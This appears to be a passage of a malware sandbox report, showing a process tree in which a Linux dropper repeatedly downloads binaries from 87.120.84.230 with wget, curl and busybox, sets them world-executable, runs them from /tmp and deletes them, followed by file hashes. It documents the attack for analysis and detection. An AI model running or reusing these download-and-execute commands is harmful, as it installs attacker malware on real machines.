/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:1645
-
-
/bin/chmodchmod 777 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL./fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:1648
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:1649
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:1651
-
-
/bin/chmodchmod 777 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp./G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:1654
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:1655
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:1657
-
-
/bin/chmodchmod 777 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- File and Directory Permissions Modification
PID:1658
-
-
/tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN./Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Executes dropped EXE
PID:1659
-
-
/bin/rmrm Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:1660
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:1661
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Writes file to tmp directory
PID:1662
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:1663
-
-
/bin/chmodchmod 777 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- File and Directory Permissions Modification
PID:1664
-
-
/tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z./ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Executes dropped EXE
PID:1665
-
-
/bin/rmrm ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:1666
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:1667
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Writes file to tmp directory
PID:1668
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:1669
-
-
/bin/chmodchmod 777 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- File and Directory Permissions Modification
PID:1670
-
-
/tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs./AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Executes dropped EXE
PID:1671
-
-
/bin/rmrm AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:1672
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:1673
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Writes file to tmp directory
PID:1674
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:1675
-
-
/bin/chmodchmod 777 djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- File and Directory Permissions Modification
PID:1676
-
-
/tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003./djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Executes dropped EXE
PID:1677
-
-
/bin/rmrm djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:1678
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97